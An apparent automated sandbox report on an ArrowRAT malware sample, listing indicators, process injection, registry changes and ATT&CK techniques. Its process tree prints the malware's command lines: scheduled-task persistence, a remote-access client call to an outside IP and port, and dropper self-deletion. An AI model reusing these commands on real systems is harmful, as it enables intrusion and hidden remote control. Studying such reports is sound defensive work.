arrowrat | 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MRH.exe

Loads dropped DLL 1 IoCs

pid	Process
2428	Quoko tace wesa.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 848 set thread context of 2224	848	tmp.exe	82
PID 2428 set thread context of 2780	2428	Quoko tace wesa.exe	109
PID 2780 set thread context of 2572	2780	InstallUtil.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1296	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	InstallUtil.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{DE72C25A-EC8B-459E-A4FB-594371597111}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
960	PING.EXE

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
3144	MRH.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2428	Quoko tace wesa.exe
2780	InstallUtil.exe
2780	InstallUtil.exe
2780	InstallUtil.exe
2780	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	InstallUtil.exe
Token: SeShutdownPrivilege	2316	explorer.exe
Token: SeCreatePagefilePrivilege	2316	explorer.exe
Token: SeShutdownPrivilege	2316	explorer.exe
Token: SeCreatePagefilePrivilege	2316	explorer.exe
Token: SeShutdownPrivilege	2316	explorer.exe
Token: SeCreatePagefilePrivilege	2316	explorer.exe
Token: SeShutdownPrivilege	2316	explorer.exe
Token: SeCreatePagefilePrivilege	2316	explorer.exe
Token: SeShutdownPrivilege	2316	explorer.exe
Token: SeCreatePagefilePrivilege	2316	explorer.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
3592	AcroRd32.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe
2316	explorer.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2224	InstallUtil.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
3592	AcroRd32.exe
2780	InstallUtil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 848 wrote to memory of 2224	848	tmp.exe	82
PID 2224 wrote to memory of 3592	2224	InstallUtil.exe	85
PID 2224 wrote to memory of 3592	2224	InstallUtil.exe	85
PID 2224 wrote to memory of 3592	2224	InstallUtil.exe	85
PID 3592 wrote to memory of 2400	3592	AcroRd32.exe	88
PID 3592 wrote to memory of 2400	3592	AcroRd32.exe	88
PID 3592 wrote to memory of 2400	3592	AcroRd32.exe	88
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 1160	2400	RdrCEF.exe	90
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91
PID 2400 wrote to memory of 3136	2400	RdrCEF.exe	91

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2376

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:848
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D1A32B0FF9FEE30EF866219D17F35A8A --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1160
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=76235904D0D319AF3994BFE77FFEC537 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=76235904D0D319AF3994BFE77FFEC537 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:3136
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2BBE79CCB81E0652D8CDD8046EB335BA --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1944
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=308D3CA27557840012F9B5B415F097B4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=308D3CA27557840012F9B5B415F097B4 --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:1196
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64EC4B0EE101446867FFC9CF1C0E8EDB --mojo-platform-channel-handle=1844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4044
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9F3E6E81539061B6CE6FB00F4C08C931 --mojo-platform-channel-handle=2104 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3644
- - C:\Users\Admin\AppData\Local\Temp\MRH.exe
    "C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious behavior: EnumeratesProcesses
    PID:3144
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
      4⤵
      Creates scheduled task(s)
      PID:1296
  - - C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
      "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:2428
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2780
      - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        6⤵
        Modifies Installed Components in the registry
        Enumerates connected drives
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2316
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
        6⤵
        
        PID:4124
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
        6⤵
        
        PID:2572
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
      4⤵
      PID:2516
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:492
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:960
- - C:\Users\Admin\AppData\Local\Temp\ROR.exe
    "C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
    3⤵
    - Executes dropped EXE
    PID:3120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:4840

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3932

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4072

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1952

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery